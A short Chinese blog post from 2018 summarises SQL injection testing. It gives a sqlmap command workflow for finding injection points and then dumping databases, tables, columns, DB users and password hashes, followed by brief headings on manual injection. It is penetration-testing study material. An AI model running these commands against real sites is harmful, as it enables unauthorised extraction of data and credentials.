测试

SQL注入漏洞测试的方式总结

2018-07-02  本文已影响129人  Fighting_001

一、工具注入

1.SQLMap的作用

2.注入技术

3.操作步骤

1)利用扫描工具(如AppScan/AWVS),遍历探索网站,找出带参数的动态url
2)初步判断是否为SQL注入的链接
3)利用自动化工具or手工进一步验证是否为注入点
python sqlmap.py -u "xxx"
python sqlmap.py -u "xxx" --cookie="cookie"
python sqlmap.py -u "xxx" --data="parameter=value"
4)若是注入点,则获取DB的类型和版本、服务器信息
5)DB的数目及名称
python sqlmap.py -u "xxx" --dbs
6)每个DB下面的表
python sqlmap.py -u "xxx" -D dbName --tables
7)表中的字段(列)
直接输出指定DB指定Table的列表&值的信息
python sqlmap.py -u "xxxx" -D dbName -T tblName --dump
python sqlmap.py -u "xxx" -D dbname -T tblName --columns
8)字段的属性值
python sqlmap.py -u "xxx" -D dbName -T tblName -C "x1,x2,..." --dump
9)查看Web当前使用的DB
python sqlmap.py -u "xxx" --current-db
10)列出DB Server所有用户
python sqlmap.py -u "xxx" --users
11)DB的账户和密码
python sqlmap.py -u "xxx" --passwords

二、手工注入

1.注入参数类型

2.判断注入原则

确认是否存在SQL注入漏洞,主要是理解服务器端正在执行什么SQL代码,然后针对每种情况构造注入相应的条件,收集所返回的响应情况,推测SQL注入的类型,逐步猜解数据库相关的数据信息

3.常见注入点

根据应用程序和数据交互的地方进行判断


SQL注入测试实践 ==> SQL注入漏洞案例实践学习记录(2018.7-2018.8)

上一篇 下一篇

猜你喜欢

热点阅读